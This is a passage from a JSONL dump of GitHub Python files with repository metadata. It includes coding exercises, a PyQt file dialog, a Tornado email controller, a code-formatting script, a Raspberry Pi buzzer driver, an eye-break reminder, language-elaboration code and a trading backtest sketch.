QApplication(sys.argv)\r\n window = Window()\r\n window.resize(500, 500)\r\n window.show()\r\n\r\n sys.exit(app.exec_())\r\n","repo_name":"sevenandseven/pyqt5_learning","sub_path":"input_widget/QFileDialog----静态方法.py","file_name":"QFileDialog----静态方法.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44673834222","text":"import math\nimport sys\n\n\nif __name__ == \"__main__\":\n inputdata = open(sys.argv[1], \"r\").readlines()\n target = int(inputdata[0])\n buses = [int(bus) for bus in inputdata[1].strip().split(\",\") if bus != \"x\"]\n diff = [(int(target/bus)+1)*bus - target for bus in buses]\n min_diff = min(diff)\n print(\"Part 1:\", buses[diff.index(min_diff)]*min_diff)\n\n buses = [(i,int(bus)) for i,bus in enumerate(inputdata[1].strip().split(\",\")) if bus != \"x\"]\n\n increase = 1\n t = 0\n\n # initially, I had the loop the otherway around and was checking each\n # increment (by 1) of the timestamp.\n # however, that is very slow, the other way around is basically instantaneous\n for dt, bus in buses:\n while True:\n if (dt+t)%bus == 0:\n break\n # start with increase 1 until the first bus loop is found,\n # then multiply the loop time to increase for each matching bus \n t += increase\n # for each bus, add the loop time to increase\n increase *= bus\n\n print(\"Part 2:\", t)\n \n\n","repo_name":"tobigrimm/adventofcode2020","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6728148154","text":"from math import gcd\n\nA, B = map(int, input().split())\nB //= A\n\nfor i in range(round(B**0.5), 0, -1):\n if i**2 > B or B % i:\n continue\n\n if gcd(i, B // i) == 1:\n print(A * i, A * B // i)\n break\n","repo_name":"woohyunjng/Coding-Practice","sub_path":"Python/Baekjoon/.2000/2436.py","file_name":"2436.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27862074133","text":"from .managers import *\nfrom ...common.controllers import CrudController\nfrom ...personal.persona.managers import *\n\nimport json\n\n\nclass CorreoController(CrudController):\n\n manager = CorreoManager\n html_index = \"notificaciones/correo/views/index.html\"\n html_table = \"notificaciones/correo/views/table.html\"\n routes = {\n '/correo': {'GET': 'index', 'POST': 'table'},\n '/correo_insert': {'PUT': 'correos', 'POST': 'insert'},\n '/correo_update': {'PUT': 'edit', 'POST': 'update'},\n '/correo_delete': {'POST': 'delete_correo'},\n '/correo_dias': {'POST': 'actualizar_dias'},\n '/correo_hora': {'PUT': 'edit', 'POST': 'update_hora'},\n }\n\n def get_extra_data(self):\n aux = super().get_extra_data()\n aux['personal'] = PersonaManager(self.db).listar_todo()\n aux['hora_notificacion'] = CorreoManager(self.db).obtener_servidor()\n\n return aux\n\n def insert(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n CorreoManager(self.db).update(diccionary)\n self.respond(success=True, message='Insertado correctamente.')\n\n def update(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n CorreoManager(self.db).update(diccionary)\n self.respond(success=True, message='Modificado correctamente.')\n\n def edit(self):\n self.set_session()\n self.verif_privileges()\n ins_manager = self.manager(self.db)\n diccionary = json.loads(self.get_argument(\"object\"))\n indicted_object = ins_manager.obtener_servidor()\n if len(ins_manager.errors) == 0:\n self.respond(indicted_object.get_dict(), message='Operacion exitosa!')\n else:\n self.respond([item.__dict__ for item in ins_manager.errors], False, 'Ocurrió un error al insertar')\n self.db.close()\n\n def correos(self):\n self.set_session()\n self.verif_privileges()\n ins_manager = self.manager(self.db)\n indicted_object = ins_manager.obtener_servidor()\n if len(ins_manager.errors) == 0:\n self.respond(indicted_object.get_dict(), message='Operacion exitosa!')\n else:\n self.respond([item.__dict__ for item in ins_manager.errors], False, 'Ocurrió un error al insertar')\n self.db.close()\n\n def actualizar_dias(self):\n self.set_session()\n id = json.loads(self.get_argument(\"id\"))\n state = json.loads(self.get_argument(\"enabled\"))\n updated_object = self.manager(self.db).actualizacion_dias(id, state)\n if state:\n message = \"Dia dado de Alta!\"\n else:\n message = \"Dia dado de Baja!\"\n self.respond(updated_object.get_dict(), message=message)\n self.db.close()\n\n def delete_correo(self):\n self.set_session()\n self.verif_privileges()\n id = json.loads(self.get_argument(\"id\"))\n state = json.loads(self.get_argument(\"enabled\"))\n updated_object = self.manager(self.db).delete(id, state)\n if state:\n message = \"Correo dado de Alta!\"\n else:\n message = \"Correo dado de Baja!\"\n self.respond(updated_object.get_dict(), message=message)\n self.db.close()\n\n def update_hora(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n objeto = self.manager(self.db).obtener_servidor()\n objeto.hora = datetime.strptime('01/01/2000 '+diccionary['hora'], '%d/%m/%Y %H:%M')\n CorreoManager(self.db).update_hora(objeto,diccionary['user'],diccionary['ip'])\n self.respond(success=True, message='Modificado correctamente.')\n","repo_name":"berthy7/cloudgh","sub_path":"server/notificaciones/correo/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15952927649","text":"import os\nimport subprocess\nfrom os import walk\n\nf = []\nexclude = [\"res\", \"custom_fpd_lib\", \"tests\"]\nfor (dirpath, dirnames, filenames) in walk(\"./\", topdown=True):\n dirnames[:] = [d for d in dirnames if d not in exclude]\n f.extend([os.path.join(*dirpath.split(\"/\"), s) for s in filenames])\ntmp = [el for el in f if el[-3:] == \".py\"]\nprint(f\"Found {len(tmp)} files: Compiling.....\")\nfor el in tmp:\n print(f\"========== Formatting {el}\")\n subprocess.run(\"autoflake --in-place --remove-all-unused-imports \" + el, shell=True, check=True)\n subprocess.run(\"isort \" + el, shell=True, check=True)\n subprocess.run(\"autopep8 --in-place --aggressive --aggressive \" + el, shell=True, check=True)\n","repo_name":"CS26-FPD-Explorer/FPD-Explorer","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"31340542634","text":"# 文件写入在没有关闭之前会在内存中存储并没有真实写入\n# 关闭的时候会自动刷新缓冲区\n\n# 需要在cmd中查看效果\n\nf = open('test.txt', 'w', encoding='utf8')\nf.write('Hello')\n# 手动刷新缓存区将内容写入磁盘\nf.flush()\nf.close()\n\n# demo\nimport sys, time\nfor i in range(30):\n # 不会换行\n # sys.stdout.write('*') # 先存入缓存区等待30个都存入之后再写入磁盘显示\n # 每次都刷新下缓存区\n # sys.stdout.flush()\n # print('*')\n # print 不换行\n # print(\"-\", end='')\n # print 不换行 刷新\n print('*', end='', flush=True)\n # 实际是 0.1 * 30\n time.sleep(0.1)\n","repo_name":"ToWorkit/Python_base","sub_path":"文件操作/刷新缓存区.py","file_name":"刷新缓存区.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19976188339","text":"import pigpio\nimport logging\nimport time\n\nfrom src.main.commons.utils.utils import base_init\n\nlogger = logging.getLogger(\"drishti_buzzer\")\n\n\nclass Buzzer:\n def __init__(self, pi):\n self.pi = pi\n self.buzzerPin = 4\n self.pi.set_mode(self.buzzerPin, pigpio.OUTPUT)\n self.pi.write(self.buzzerPin, pigpio.LOW)\n logger.info(\"Buzzer Init\")\n\n def double_beep(self, time_gap=0.2):\n logger.debug(\"Buzzing Double\")\n self.single_beep(time_gap)\n self.single_beep(time_gap)\n\n def single_beep(self, time_gap=0.2):\n logger.debug(\"Beeping\")\n self.switch_on()\n time.sleep(time_gap)\n self.switch_off()\n time.sleep(time_gap)\n\n def error_beep(self):\n logger.debug(\"Beeping error\")\n self.single_beep(0.1)\n self.single_beep(0.1)\n self.single_beep(0.1)\n\n def switch_on(self):\n logger.debug(\"Buzzing On\")\n self.pi.write(self.buzzerPin, pigpio.HIGH)\n\n def switch_off(self):\n logger.debug(\"Buzzing OFF\")\n self.pi.write(self.buzzerPin, pigpio.LOW)\n\n def cleanup(self):\n self.switch_off()\n\n\ndef loop():\n while True:\n buzzer.switch_on()\n time.sleep(1)\n buzzer.switch_off()\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n base_init()\n pi = pigpio.pi()\n buzzer = Buzzer(pi)\n buzzer.switch_off()\n try:\n loop()\n except KeyboardInterrupt:\n buzzer.cleanup()\n","repo_name":"DrvAgwl/drishti","sub_path":"src/main/commons/hal/buzzer.py","file_name":"buzzer.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38623550936","text":"from .rsttree import RstTree, RstNode, Span, MonoNucRelation\nfrom .relationstable import RelTable, Relation, RelElement\n\nfrom collections import deque\n\n\nclass TableGenerator():\n def __init__(self):\n return\n\n def run(self, rstTree: RstTree) -> RelTable:\n # process mono-nuclear relations\n monoRelTable = RelTable()\n for monoNuc in rstTree.monoNucs:\n cs = extractCentralSubconstituent(nodes=[monoNuc.start],\n isNuclear=False)\n relation = Relation()\n relation.isMultiNuclear = False\n relation.name = monoNuc.relation\n relation.constituent = extractRelElement(node=monoNuc.start,\n isNuclear=False)\n relation.attachmentPoint = extractRelElement(node=monoNuc.end,\n isNuclear=True)\n relation.centralSubconstituent = cs\n monoRelTable.append(relation)\n\n # process multi-nuclear relations\n multiRelTable = RelTable()\n for multiNuc in rstTree.multiNucs:\n remainingNodes = deque(multiNuc.children)\n while len(remainingNodes) > 1:\n cs = extractCentralSubconstituent(nodes=remainingNodes,\n isNuclear=True)\n currentNode = remainingNodes.popleft()\n pseudoNode = createPseudoNode(remainingNodes)\n\n relation = Relation()\n relation.name = multiNuc.relation\n relation.isMultiNuclear = True\n relation.centralSubconstituent = cs\n relation.constituent = extractRelElement(node=currentNode,\n isNuclear=True)\n relation.attachmentPoint = extractRelElement(node=pseudoNode,\n isNuclear=True)\n multiRelTable.append(relation)\n\n # sort relations table\n monoRelTable.sort(key=sortRels)\n multiRelTable.sort(key=sortRels)\n\n return monoRelTable + multiRelTable\n\n\ndef sortRels(rel: Relation):\n return(0.99999*rel.centralSubconstituent[0].minID +\n 0.00001*rel.centralSubconstituent[-1].maxID)\n\n\ndef extractRelElement(node: RstNode, isNuclear: bool) -> RelElement:\n relElement = RelElement()\n relElement.minID = min(node.segmentID)\n relElement.maxID = max(node.segmentID)\n relElement.isLeaf = (node.text is not None)\n relElement.isNuclear = isNuclear\n return relElement\n\n\ndef createPseudoNode(nodes: list) -> RstNode:\n \"\"\" Creates a pseudo node as a representant of a list of nodes\n for generation of attachment point in multi-nuclear relations \"\"\"\n if len(nodes) > 1:\n ids = []\n for node in nodes:\n for id in node.segmentID:\n ids.append(id)\n\n pseudoNode = RstNode()\n pseudoNode.segmentID = [min(ids), max(ids)]\n return pseudoNode\n else:\n return nodes[0]\n\n\ndef extractCentralSubconstituent(nodes: list, isNuclear: bool):\n cs = []\n for node in nodes:\n monoNucRel = extractMonoNuclearRelation(node)\n if monoNucRel is not None:\n relElem = extractRelElement(node=monoNucRel.end,\n isNuclear=True)\n else:\n relElem = extractRelElement(node, isNuclear)\n cs.append(relElem)\n return cs\n\n\ndef extractMonoNuclearRelation(node: RstNode) -> MonoNucRelation:\n hasSpanBelow = isinstance(node.toChildren, Span)\n if hasSpanBelow:\n return node.toChildren.children[0].toSibling\n else:\n return None\n","repo_name":"tkutschbach/RST-Tace","sub_path":"rsttace/core/reltablegenerator.py","file_name":"reltablegenerator.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"69880034680","text":"#From: https://byui-cse.github.io/cse111-course/lesson02/check.html\n#By: Felipe dos Santos Belisário\n\n\"\"\"\nAssignment\nA manufacturing company needs a program that will help its employees pack manufactured items into boxes for shipping. Write a Python program named boxes.py that asks the user for two integers:\n\n1- the number of manufactured items\n2- the number of items that the user will pack per box\n\nYour program must compute and print the number of boxes necessary to hold the items. This must be a whole number. Note that the last box may be packed with fewer items than the other boxes.\n\n\"\"\"\nimport math\n#Function\ndef boxes_total(items, items_per_box):\n boxes = items / items_per_box\n return math.ceil(boxes) #module function\n\n\n\n\n\n#Built-in functions\nnumber_items = int(input('Enter the number of items: ')) \nitems_per_box = int(input('Enter the number of items per box: '))\n\nprint(f'\\nFor {number_items} items, packing {items_per_box} items in each box, you will need {boxes_total(number_items, items_per_box)} boxes.')\n","repo_name":"felipesud/byu-idaho","sub_path":"cse111/week01_Getting_Started/02checkpoint_boxes.py","file_name":"02checkpoint_boxes.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8269910966","text":"from tkinter import Tk\r\nimport tkinter as tk\r\nfrom keyboard import press_and_release\r\nfrom time import sleep\r\n\r\nbackground_color = \"#33334d\" # one variable to make all changes when you wont to change the background color\r\n\r\nclass GUI():\r\n def __init__(self):\r\n # Define our quote window\r\n self.root = Tk()\r\n self.root.attributes('-fullscreen', True) # to show a full screen window\r\n self.root.attributes('-alpha', 0.8) # to make our window transparent\r\n self.root.configure(bg=background_color) # background color\r\n self.quote_label = tk.Label(self.root, text=\"text\", fg=\"orange\", bg=background_color, justify=\"center\", wraplength=600)\r\n self.quote_label.config(font=('times', 24, 'bold'))\r\n self.quote_label.pack(padx=None, pady=250) # position label at the middle\r\n self.show()\r\n\r\n\r\n def show(self):\r\n press_and_release(\"cmd + d\")\r\n self.quotes_text()\r\n self.root.deiconify()\r\n # self.root.attributes('-topmost', 0)\r\n self.root.attributes('-topmost', 1)\r\n self.root.after(3000, self.hide) # duration: quote display > \"5000 (5 sec)\"\r\n\r\n def hide(self):\r\n self.root.iconify() # hide the window\r\n sleep(30) # duration: Stretching and looking for a 6 feet object away form you > 30sec \r\n self.notify()\r\n press_and_release(\"cmd + d\")\r\n self.root.after(1200000, self.show) # duration: working > \"1200000 (20 minutes)\"\r\n\r\n\r\n def quotes_text(self):\r\n from random import choice\r\n quote_file = \"E:\\\\Extension\\\\quotes_file.txt\" # the quote file directory\r\n with open(quote_file, \"r\", encoding=\"utf8\") as f:\r\n global random_quote\r\n random_quote = choice(f.readlines())\r\n self.quote_label['text'] = random_quote # to change the text in label to another random quote every time we call the function\r\n\r\n def notify(self):\r\n import winsound\r\n winsound.PlaySound(\"SystemHand\", winsound.SND_ALIAS)\r\n\r\nif __name__ == '__main__':\r\n gui = GUI()\r\n gui.root.mainloop()","repo_name":"MunoHeart/20-20-20","sub_path":"20-20-20(3)/20-20-20(3).py","file_name":"20-20-20(3).py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"930786740","text":"from copy import deepcopy\nfrom typing import List\n\nfrom IntermediateLanguage.Dictionaries.Dictionary import DictionaryDelta\nfrom IntermediateLanguage.Environment.Element import IPElem\nfrom IntermediateLanguage.Environment.environment import IP, IGC, IGamma\nfrom IntermediateLanguage.Terms.Term import ITermQAbs, ITermTypeAbs\nfrom SourceLanguageFD.Constraint.TC import FDTCA, FDTCTau\nfrom SourceLanguageFD.Constraint.constraint import FDQ, FDQSubst\nfrom SourceLanguageFD.Environment.AbstractElement import FDGammaElem, FDGCElemAbstract, FDPElemAbstract\nfrom SourceLanguageFD.Environment.AbstractEnvironment import FDAbstractP, FDAbstractGC, FDAbstractGamma\nfrom SourceLanguageFD.Environment.Element import FDGammaX, FDGammaA, FDGammaQ\nfrom SourceLanguageFD.Types.AbstractTypes import FDSigma, FDTau\nfrom SourceLanguageFD.Types.Tau import FDTypeSubst, FDTypeA\nfrom exceptions import NotFoundError\n\n\nclass FDGC(FDAbstractGC):\n elements = []\n\n def __init__(self, gcList: List[FDGCElemAbstract]):\n super().__init__()\n self.elements = gcList\n\n def addElement(self, element: FDGCElemAbstract):\n self.elements.append(element)\n\n def addElements(self, elements: List[FDGCElemAbstract]):\n self.elements = self.elements + elements\n\n def getSigmaFromName(self, name: str) -> FDSigma:\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.sigma\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getSigmaFromMethod(self, m: str) -> FDSigma:\n for elem in self.elements:\n if elem.m == m:\n return elem.sigma\n raise NotFoundError(\"Method with name \" + m + \"was not found in the context.\")\n\n def getAFromName(self, name: str):\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.tc.tList\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getGC1FromName(self, name: str):\n result = []\n for elem in self.elements:\n if elem.tc.name == name:\n return FDGC(result)\n else:\n result.append(elem)\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getTCFromMethod(self, m: str) -> FDTCA:\n for elem in self.elements:\n if elem.m == m:\n return elem.tc\n raise NotFoundError(\"Method with name \" + m + \"was not found in the context.\")\n\n def getTCListFromMethod(self, m: str) -> List[FDTCA]:\n for elem in self.elements:\n if elem.m == m:\n return elem.tcList\n raise NotFoundError(\"Method with name \" + m + \"was not found in the context.\")\n\n def getTCListFromName(self, name: str) -> List[FDTCA]:\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.tcList\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def closure(self, qList: List[FDQ]):\n if len(qList) == 0:\n return []\n else:\n qiNew = deepcopy(qList)\n q = qiNew.pop()\n qm = self.getTCListFromName(q.tc.name)\n qiNew += qm\n tList = q.tc.tList\n aList = self.getAFromName(q.tc.name)\n assert len(tList) == len(aList)\n assert all(tList[i].equals(aList[i]) for i in range(len(tList)))\n return self.closure(qiNew) + [q.tc]\n\n def elaborate(self):\n gcE = deepcopy(self)\n gcE.elements = deepcopy(self.elements)\n gcNew = IGC([])\n while len(gcE.elements) > 0:\n element = gcE.removeLastElement()\n gcNew.insertElement(element.elaborate(self))\n return gcNew\n\n def inGC(self, aList: List[FDTypeA], tau: FDTau):\n for element in self.elements:\n tList = element.tc.tList\n if element.sigma.getTau().equals(tau) and len(tList) == len(aList) and all(\n tList[i].equals(aList[i]) for i in range(len(aList))):\n return True\n return False\n\n def getFDFromName(self, name):\n for elem in self.elements:\n if elem.tc.name == name:\n return elem.fd\n raise NotFoundError(\"Typeclass with name \" + name + \"was not found in the context.\")\n\n def getDependants(self, tc):\n aList = self.getAFromName(tc.name)\n fdList = self.getFDFromName(tc.name).aList2\n return substitute(tc.tList, aList, fdList)\n\n\nclass FDGamma(FDAbstractGamma):\n elements = []\n\n def __init__(self, gammaList: List[FDGammaElem]):\n super().__init__()\n self.elements = gammaList\n\n def addElement(self, element: FDGammaElem):\n self.elements.append(element)\n\n def addElements(self, elements: List[FDGammaElem]):\n self.elements = self.elements + elements\n\n def contains(self, item: FDGammaElem) -> bool:\n return any(element.equals(item) for element in self.elements)\n\n def containsTypeVar(self, item: FDTypeA) -> bool:\n return any(element.equals(FDGammaA(item)) for element in self.elements)\n\n def getSigmaFromX(self, x: str) -> FDSigma:\n for element in self.elements:\n if isinstance(element, FDGammaX) and element.x == x:\n return element.sigma\n raise NotFoundError(\"Variable with name \" + x + \"was not found in the context.\")\n\n def equals(self, gamma: FDAbstractGamma):\n return (len(gamma.elements) == len(self.elements)\n and all(gamma.elements[i].equals(self.elements[i]) for i in range(len(self.elements))))\n\n def setElements(self, elements: List[FDGammaElem]):\n self.elements = elements\n\n def elaborate(self, p: FDAbstractP, gc: FDAbstractGC):\n gammaE = deepcopy(self)\n gammaE.elements = deepcopy(self.elements)\n gammaNew = IGamma([])\n while len(gammaE.elements) > 0:\n element = gammaE.removeLastElement()\n gammaNew.insertElement(element.elaborate(p, gc))\n return gammaNew\n\n def getDeltaIndex(self):\n i = 0\n for element in self.elements:\n if isinstance(element, FDGammaQ):\n i += 1\n return i\n\n def getDeltaOfGammaQ(self, gammaQ: FDGammaQ):\n i = 0\n for element in self.elements:\n if isinstance(element, FDGammaQ):\n if element.equals(gammaQ):\n return i\n else:\n i += 1\n raise NotFoundError(\"Constraint was not found in the context.\")\n\n\ndef substitute(tList, aList1, aList2):\n assert len(tList) == len(aList1)\n result = deepcopy(aList2)\n for i in range(len(aList1)):\n for j in range(len(aList2)):\n if aList1[i] == aList2[j]:\n result[j] = tList[i]\n return result\n\n\nclass FDP(FDAbstractP):\n elements = []\n\n def __init__(self):\n super().__init__()\n self.elements = []\n\n def addElement(self, element: FDPElemAbstract):\n self.elements.append(element)\n\n def addElements(self, elements: List[FDPElemAbstract]):\n self.elements = self.elements + elements\n\n def wellFormed(self, gc: FDGC, gamma: FDGamma) -> bool:\n if len(self.elements) == 0:\n if len(gamma.elements) == 0:\n if len(gc.elements) == 0:\n # sCtx-empty\n return True\n else:\n # sCtx-clsEnv\n gcNew = deepcopy(gc)\n gcNew.elements = deepcopy(gc.elements)\n element = gcNew.removeLastElement()\n gammaNew = FDGamma(list(map(lambda a: FDGammaA(a), element.tc.tList)))\n sigma = element.sigma\n aj = sigma.getVariables() + element.tc.tList\n return (sigma.wellTyped(gammaNew, gcNew)\n and all(any(a.equals(fv) for fv in sigma.getTau().getFreeVars()) for a in aj)\n and all(FDQ(tc).wellFormed(gammaNew, gcNew) for tc in element.tcList)\n and all(not (element.m == gcElem.m) for gcElem in gcNew.elements)\n and all(not (element.tc.name == gcElem.tc.name) for gcElem in gcNew.elements)\n and self.wellFormed(gcNew, gamma))\n else:\n gammaNew = deepcopy(gamma)\n gammaNew.elements = deepcopy(gamma.elements)\n element = gammaNew.removeLastElement()\n if isinstance(element, FDGammaX):\n # sCtx-TyEnvTm\n return (element.sigma.wellTyped(gammaNew, gc)\n and all(not (isinstance(g, FDGammaX) and g.x == element.x) for g in gammaNew.elements)\n and self.wellFormed(gc, gammaNew))\n elif isinstance(element, FDGammaA):\n # sCtx-TyEnvTy\n return (all(not (isinstance(g, FDGammaA) and g.equals(element)) for g in gammaNew.elements)\n and self.wellFormed(gc, gammaNew))\n elif isinstance(element, FDGammaQ):\n # sCtx-TyEnvD\n return (element.q.wellFormed(gammaNew, gc)\n and self.wellFormed(gc, gammaNew))\n else:\n return False\n else:\n # sCtx-PgmInst\n pNew = deepcopy(self)\n pNew.elements = deepcopy(self.elements)\n element = pNew.removeLastElement()\n tList = element.c.q.tc.tList\n bj = element.c.aList\n gammaElements = list(map(lambda a: FDGammaA(a), bj))\n gammaElements += list(map(lambda q: FDGammaQ(q), element.c.qList))\n tc = gc.getTCFromMethod(element.m)\n sigma = gc.getSigmaFromMethod(element.m)\n gammaElements += list(map(lambda a: FDGammaA(a), sigma.getVariables()))\n gammaElements += list(map(lambda q: FDGammaQ(FDQSubst(tList, tc.tList, q)), sigma.getConstraints()))\n gammaNew = FDGamma(gammaElements)\n tauSubst = FDTypeSubst(tList, tc.tList, sigma.getTau())\n for i in range(len(pNew.elements)):\n if pNew.elements[i].c.q.tc.name == tc.name:\n bk = pNew.elements[i].c.aList\n tOtherList = pNew.elements[i].c.q.tc.tList\n if all(tList[j].equalsWithVars(bj, tOtherList[j], bk) for j in range(len(tList))):\n return False\n\n return (element.gamma.equals(gammaNew)\n and element.c.unambiguous(pNew, gc)\n and element.c.wellFormed(FDGamma([]), gc)\n and element.e.hasType(pNew, gc, gammaNew, tauSubst)\n and sigma.wellTyped(FDGamma(list(map(lambda a: FDGammaA(a), tc.tList))), gc)\n and pNew.wellFormed(gc, gamma))\n\n def getQiFromQ(self, q: FDQ):\n for element in self.elements:\n if element.c.q.equals(q):\n return element.c.qList\n raise NotFoundError(\"Instantiation with typeclass \" + q.tc.name + \"was not found in the context.\")\n\n def getDFromQ(self, q: FDQ):\n for i in range(len(self.elements)):\n element = self.elements[i]\n if element.c.q.equals(q):\n return i\n raise NotFoundError(\"Instantiation with typeclass \" + q.tc.name + \"was not found in the context.\")\n\n def elaborate(self, gc: FDGC):\n pE = deepcopy(self)\n pE.elements = deepcopy(self.elements)\n pNew = IP()\n\n while len(pE.elements) > 0:\n element = pE.removeLastElement()\n bj = element.c.aList\n qi = element.c.qList\n sigma = gc.getSigmaFromName(element.c.q.tc.name)\n ak = sigma.getVariables()\n qh = sigma.getConstraints()\n t = element.c.q.tc.tList\n a = gc.getAFromName(element.c.q.tc.name)\n tNew = sigma.getTau()\n gammaNew = FDGamma(list(map(lambda bi: FDGammaA(bi), bj))\n + list(map(lambda qj: FDGammaQ(qj), qi))\n + list(map(lambda ai: FDGammaA(ai), ak))\n + list(map(lambda qj: FDGammaQ(qj), qh)))\n e = element.e.elaborateWithType(pE, gc, gammaNew, FDTypeSubst(t, a, tNew))\n delta = len(qi) + len(qh)\n for q in qh:\n e = ITermQAbs(DictionaryDelta(delta), FDQSubst(t, a, q).elaborate(pNew, gc), e)\n delta -= 1\n for a in ak:\n e = ITermTypeAbs(a.elaborate(), e)\n for q in qi:\n e = ITermQAbs(DictionaryDelta(delta), q.elaborate(), e)\n delta -= 1\n for a in bj:\n e = ITermTypeAbs(a.elaborate(), e)\n pNew.insertElement(IPElem(element.c.elaborate(gc), element.m, e))\n return pNew\n\n def hasFunctionalDependency(self, gc: FDGC, tc: FDTCTau):\n aList = gc.getAFromName(tc.name)\n tList = tc.tList\n fdList = gc.getFDFromName(tc.name).aList1\n fdResult = substitute(tList, aList, fdList)\n if len(fdList) == 0:\n return False\n for element in self.elements:\n if element.c.q.tc.name == tc.name:\n fdResult2 = substitute(element.c.q.tc.tList, aList, fdList)\n if all(fdResult[i].equals(fdResult2[i]) for i in range(len(fdResult))):\n return True\n return False\n\n def getFunctionalDependency(self, gc: FDGC, tc: FDTCTau):\n aList = gc.getAFromName(tc.name)\n tList = tc.tList\n fdList = gc.getFDFromName(tc.name).aList1\n fdResult = substitute(tList, aList, fdList)\n for element in self.elements:\n if element.c.q.tc.name == tc.name:\n fdResult2 = substitute(element.c.q.tc.tList, aList, fdList)\n if all(fdResult[i].equals(fdResult2[i]) for i in range(len(fdResult))):\n return element.c.q.tc\n","repo_name":"LenaDooms/Implementatie","sub_path":"SourceLanguageFD/Environment/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":14127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71741554361","text":"import backtesting\nfrom backtesting import Backtest, Strategy\nimport pandas as pd\nimport numpy as np\n\n# Define your custom strategy\nclass TrendFollowingStrategy(Strategy):\n\n def init(self):\n self.in_upward_trend = False\n self.upward_trend_start = None\n self.upward_trend_duration = None\n\n def next(self):\n if not self.in_upward_trend and self.data['close'] > self.data['close'].shift(1):\n self.in_upward_trend = True\n self.upward_trend_start = self.data.datetime.iloc[-1]\n elif self.in_upward_trend and self.data.datetime.iloc[-1] - self.upward_trend_start >= pd.Timedelta(hours=self.upward_trend_duration * 0.8):\n self.in_upward_trend = False\n self.sell()\n\n if not self.in_upward_trend and self.data['close'] < self.data['close'].shift(1):\n self.in_upward_trend = False\n\n# Load and preprocess data\ndata = pd.read_csv('your_file.csv')\ndata['datetime'] = pd.to_datetime(data['datetime'])\ndata = data.set_index('datetime')\n\n# Calculate average upward trend duration\ntrends = calculate_trends(data)\nupward_durations = []\n\nfor trend in trends:\n if trend[0] == 'Upward':\n duration = calculate_duration(trend)\n upward_durations.append(duration)\n\navg_upward_duration = np.mean(upward_durations)\n\n# Calculate the sell duration\nsell_duration = avg_upward_duration * 0.8\n\n# Configure the strategy with the average trend duration\nbt = Backtest(data, TrendFollowingStrategy, cash=100000, commission=0)\nbt.strategy.upward_trend_duration = avg_upward_duration\n\n# Run the backtest\nbt.run()\n\n# Plot the backtest results\nbt.plot()","repo_name":"molenaar/Trading-Algos-By-Moon-Dev","sub_path":"trend_is_fren/trend_bt.py","file_name":"trend_bt.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31361871575","text":"# 11 Write a NumPy program to convert a list and tuple into arrays.\r\nimport numpy as np\r\n\r\nlist1 = [1,2,3,4,5]\r\nprint(np.asarray(list1))\r\n\r\ntuple1 = ([7,7,7],[8,8,8])\r\nprint(np.asarray(tuple1))\r\n\r\n# 12 Write a NumPy program to append values to the end of an array.\r\n\r\nimport numpy as np\r\n\r\na = np.array([10,15,20])\r\nprint(np.append(a,[[25,30,35],[40,45,50]]))\r\n\r\n# numpy.append(arr, values, axis=None)\r\n\r\n# 13 Write a NumPy program to create an empty and a full array.\r\n\r\nimport numpy as np\r\n\r\na = np.empty((3,3))\r\nprint(a)\r\n\r\nb = np.full((3,3),6)\r\nprint(b)\r\n","repo_name":"Viola8/Python-NLP-Libraries","sub_path":"numpy11_12_13.py","file_name":"numpy11_12_13.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24331075065","text":"'''\nYou're the shift manager at a new ice cream store opening. To ensure everyone \ngets a chance to taste the new flavors, there is a limit of one serving per person.\n\nYou notice that people are not following this rule and are coming back into the line\nto get another serving of ice cream.\n\nGiven an array of people's names, return True if you come across a person you've already\nseen in line. Otherwise, False.\n\nCan you think of any data structures that might help?\n \n\nEXAMPLE(S)\nA line with people ['Pixel', 'Pinky', 'Oliver'] should return False, as there are no people coming back.\nA line with 